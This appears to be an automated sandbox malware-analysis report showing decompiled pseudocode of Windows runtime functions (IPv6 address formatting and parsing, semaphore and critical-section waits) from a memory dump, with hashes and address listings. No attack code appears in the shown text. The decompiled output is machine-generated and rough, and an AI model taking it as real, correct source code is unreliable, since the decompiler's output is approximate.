Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: e809a5e32a9f0163e936f62360fe7af93a11d1b82049710f93d48c70faa82542
Instruction ID: e6d666b2a931329e0d0b9a06ea0ce6bf706b27f29325d4e83dba0d235fc8decd
Opcode Fuzzy Hash: e809a5e32a9f0163e936f62360fe7af93a11d1b82049710f93d48c70faa82542
Instruction Fuzzy Hash: 425107317003116BEB25CA15DCC5F6733AAAB88720F21826EED55DF2C5DBB1EC858B90

Uniqueness

Uniqueness Score: -1.00%

Function 023E14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E023E14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2482088; // 0x77507a08
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E023D7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E023E13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E023D7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E023D7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E023A2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E023AE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x023e14c0
0x023e14cb
0x023e14d2
0x023e14d6
0x023e14da
0x023e14de
0x023e14e3
0x023e157a
0x023e157a
0x023e14f1
0x023e14f3
0x0240ea0f
0x00000000
0x0240ea15
0x00000000
0x0240ea15
0x023e14f9
0x023e14f9
0x023e14fe
0x023e1504
0x0240ea1a
0x0240ea1f
0x0240ea21
0x0240ea22
0x0240ea27
0x0240ea2a
0x0240ea2a
0x023e1515
0x023e1517
0x023e156d
0x023e1572
0x023e1575
0x023e1575
0x023e151e
0x0240ea50
0x0240ea55
0x0240ea58
0x0240ea58
0x023e152e
0x023e1531
0x023e1533
0x00000000
0x023e1535
0x023e1541
0x023e1549
0x023e1549
0x023e1533
0x023e14f3
0x023e1559

APIs

___swprintf_l.LIBCMT ref: 0240EA22

Part of subcall function 023E13CB: ___swprintf_l.LIBCMT ref: 023E146B
Part of subcall function 023E13CB: ___swprintf_l.LIBCMT ref: 023E1490

___swprintf_l.LIBCMT ref: 023E156D

Strings

%%%u, xrefs: 023E1564
]:%u, xrefs: 0240EA47

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 7c43225b5b1794b77eab276ec406ba498fc0d5cb992b324be78b568584d9bbf3
Instruction ID: 732bb75cebbb142058325c83f5b7610bb1ad67cf58690cbfebda7eee959d770f
Opcode Fuzzy Hash: 7c43225b5b1794b77eab276ec406ba498fc0d5cb992b324be78b568584d9bbf3
Instruction Fuzzy Hash: DB217172A002299BDF20DE54DC40AAA73BDAB54704F444566E98BA3180DB70EA688BE1

Uniqueness

Uniqueness Score: -1.00%

Function 023C53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E023C53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024801c0;
									_push(_t92);
									_push(0);
									_t37 = E0239F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E023E4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E023F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E023F3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0242217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E023F3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E023E3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E023C5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0239F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E023E3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0239F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E023E3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0239F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E023E3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E023C5329(_t74, _t92);
													_push(1);
													_t48 = E023C53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x023c53ab
0x023c53ae
0x023c53b1
0x023c53b4
0x023c53b7
0x023e05b6
0x023e05c0
0x023e05c3
0x00000000
0x023e05c9
0x023e05c9
0x023e05cc
0x023e05d5
0x023e05d5
0x023c53bd
0x023c53bd
0x023c53bd
0x023c53be
0x023c53be
0x023c53be
0x023c53c0
0x00000000
0x00000000
0x02402269
0x0240226d
0x02402349
0x0240234d
0x02402273
0x02402276
0x02402279
0x0240227e
0x02402283
0x02402287
0x0240228a
0x0240228d
0x0240228f
0x024022bc
0x024022bc
0x024022bc
0x024022be
0x024022c4
0x024022cc
0x024022d0
0x024022d6
0x024022d7
0x024022da
0x024022df
0x024022e4
0x00000000
0x00000000
0x024022e6
0x024022e9
0x024022f4
0x024022f9
0x024022fa
0x02402305
0x02402314
0x02402319
0x0240231a
0x0240231d
0x02402320
0x02402323
0x02402323
0x02402328
0x0240232d
0x0240232f
0x02402331
0x02402336
0x02402336
0x0240233b
0x0240233d
0x02402350
0x02402351
0x02402356
0x02402359
0x02402359
0x0240235b
0x0240235d
0x023c5367
0x023c536b
0x023c5372
0x00000000
0x00000000
0x00000000
0x00000000
0x02402363
0x02402363
0x02402369
0x0240236a
0x0240236c
0x02402371
0x02402373
0x00000000
0x02402379
0x02402379
0x0240237a
0x0240237f
0x0240237f
0x02402385
0x02402386
0x02402389
0x0240238e
0x02402390
0x023c5378
0x023c537c
0x02402396
0x02402396
0x02402397
0x0240239c
0x024023a2
0x024023a3
0x024023a6
0x024023ab
0x024023ad
0x00000000
0x024023b3
0x024023b3
0x024023b4
0x024023b9
0x024023ba
0x024023ba
0x024023bc
0x024023bf
0x00000000
0x00000000
0x023f9153
0x023f9158
0x023f915a
0x023f915e
0x023f9160
0x00000000
0x023f9166
0x023f9166
0x023f9171
0x023f9176
0x023f9176
0x00000000
0x023f9160
0x024023c6
0x024023cb
0x024023ce
0x024023d7
0x024023d7
0x024023ad
0x02402390
0x02402373
0x0240233f
0x0240233f
0x00000000
0x0240233f
0x02402291
0x02402291
0x02402293
0x02402295
0x0240229a
0x024022a1
0x024022a3
0x024022a7
0x024022a9
0x00000000
0x00000000
0x024022ab
0x024022ad
0x024022af
0x00000000
0x00000000
0x00000000
0x024022af
0x024022b1
0x024022b4
0x024022b4
0x024022b6
0x00000000
0x00000000
0x00000000
0x00000000
0x024022b6
0x0240228f
0x00000000
0x0240226d
0x023c53cb
0x023c53ce
0x023c53d0
0x023c53d4
0x023c53d6
0x00000000
0x023c53d8
0x023c53e3
0x023c53ea
0x023c53ea
0x023c53d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 024022F4

Strings

RTL: Resource at %p, xrefs: 0240230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 024022FC
RTL: Re-Waiting, xrefs: 02402328

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 6bbc4ed04da874a8c04c8d21a9ff1c8c256aa53cc8e3e056f5fc68fdf5875b10
Instruction ID: 10dcf34e777c548243b5f4aa3bd6aab2529e5efacd7223914a62d2292edb0755
Opcode Fuzzy Hash: 6bbc4ed04da874a8c04c8d21a9ff1c8c256aa53cc8e3e056f5fc68fdf5875b10
Instruction Fuzzy Hash: D551E8716017116AEF21DB68DC84FA773A9AF48324F21426AFD05DB2C0EBB1E8458B90

Uniqueness

Uniqueness Score: -1.00%

Function 023CEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E023CEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E023BDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x248793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E023A16C0(_t39);
				} else {
					_t40 = E0239F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E023E3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E023A01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x248793c; // 0x0
								_push(_t85);
								_t44 = E023A1F28(_t71);
							} else {
								_t44 = E0239F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E023E3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02422306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E023CEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E023E4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E023F3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E023F3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x24820c0;
								if(_t85 != 0x24820c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0242217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E023F3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x023cec56
0x023cec56
0x023cec56
0x023cec5c
0x023cec64
0x024023e6
0x024023eb
0x024023eb
0x023cec6a
0x023cec6c
0x023cec6f
0x024023f3
0x024023f8
0x024023fa
0x024023fc
0x023cec75
0x023cec76
0x023cec76
0x023cec7b
0x023cec7c
0x023cec7e
0x02402406
0x02402407
0x0240240c
0x0240240d
0x0240240d
0x0240240d
0x02402414
0x02402417
0x0240241e
0x02402435
0x02402438
0x0240243c
0x0240243f
0x02402442
0x02402443
0x02402446
0x02402449
0x02402453
0x02402455
0x0240245b
0x0240245b
0x023ceb99
0x023ceb99
0x023ceb9c
0x023ceb9d
0x023ceb9f
0x023ceba2
0x02402465
0x0240246b
0x0240246d
0x023ceba8
0x023ceba9
0x023ceba9
0x023cebae
0x023cebb3
0x023cebb9
0x023cebbb
0x02402513
0x02402514
0x02402519
0x0240251b
0x023cec2a
0x023cec2d
0x023cec33
0x023cec36
0x023cec3a
0x023cec3e
0x023cec40
0x023cec47
0x023cec47
0x023cec40
0x023a22c6
0x023cebc1
0x023cebc1
0x023cebc5
0x023cec9a
0x023cec9a
0x023cebd6
0x023cebd6
0x00000000
0x023cebbb
0x02402477
0x0240247c
0x02402486
0x0240248b
0x02402496
0x0240249b
0x0240249d
0x024024a0
0x024024a3
0x024024aa
0x024024aa
0x024024a5
0x024024a5
0x024024a5
0x024024ac
0x024024af
0x024024b0
0x024024b3
0x024024b9
0x024024ba
0x024024bb
0x024024c6
0x024024cb
0x024024cd
0x024024d0
0x024024d1
0x024024d4
0x024024d6
0x024024d9
0x024024d9
0x024024dc
0x024024df
0x024024e1
0x024024e7
0x024024e9
0x024024ec
0x024024ef
0x024024f2
0x024024f2
0x024024ef
0x024024e7
0x024024fa
0x024024ff
0x02402501
0x02402503
0x02402506
0x0240250b
0x023ceb8c
0x023ceb93
0x00000000
0x00000000
0x023ceb93
0x00000000
0x023ceb99
0x023cec85
0x023cec85
0x023cec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0240248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 024024BD
RTL: Re-Waiting, xrefs: 024024FA

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 2d473199dc8331cecd94fb1ff42020fd08066f56c57728bf50f0b33eec1793d6
Instruction ID: d7fcda23b4a1484323edb9ada377c74504e1672e85d5cb79cbc7382a885e8fc1
Opcode Fuzzy Hash: 2d473199dc8331cecd94fb1ff42020fd08066f56c57728bf50f0b33eec1793d6
Instruction Fuzzy Hash: 8541E470600304ABDB30DB68DC88F6B77B9EF44720F20865AF9559B2C1D7B4E981CB61

Uniqueness

Uniqueness Score: -1.00%

Function 023DFCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E023DFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E023DEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E023DEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E023D685D(_t167, 4) == 0) {
								if(E023D685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E023D685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E023D685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E023B8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E023ADFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E023DEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E023DEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x023dfcd1
0x023dfcd6
0x023dfcd9
0x023dfcdc
0x023dfcdf
0x023dfce2
0x023dfce5
0x023dfce8
0x023dfceb
0x023dfced
0x023dfced
0x023dfcf3
0x00000000
0x00000000
0x023dfcfc
0x023dfcfe
0x023dfdc1
0x0240ecbd
0x00000000
0x0240eccc
0x0240eccc
0x0240ecd2
0x00000000
0x00000000
0x0240ecdf
0x0240ece0
0x0240ece4
0x0240eceb
0x0240ecee
0x0240eca8
0x0240eca8
0x0240ecaa
0x023dfd76
0x023dfd79
0x023dfdb4
0x023dfdb5
0x023dfdb6
0x00000000
0x023dfdb6
0x023dfd7e
0x0240ecfc
0x023dfe2f
0x00000000
0x023dfe2f
0x0240ed08
0x0240ed0f
0x0240ed17
0x0240ed1b
0x00000000
0x0240ed1b
0x023dfd88
0x00000000
0x00000000
0x023dfd94
0x023dfd99
0x023dfda1
0x00000000
0x00000000
0x023dfdb0
0x00000000
0x023dfdb0
0x0240ecbd
0x023dfdc7
0x023dfdcb
0x00000000
0x023dfdd7
0x023dfde3
0x023dfe06
0x023f1fe7
0x00000000
0x00000000
0x023f1fef
0x023f1ff0
0x023f1ff4
0x023f1ff7
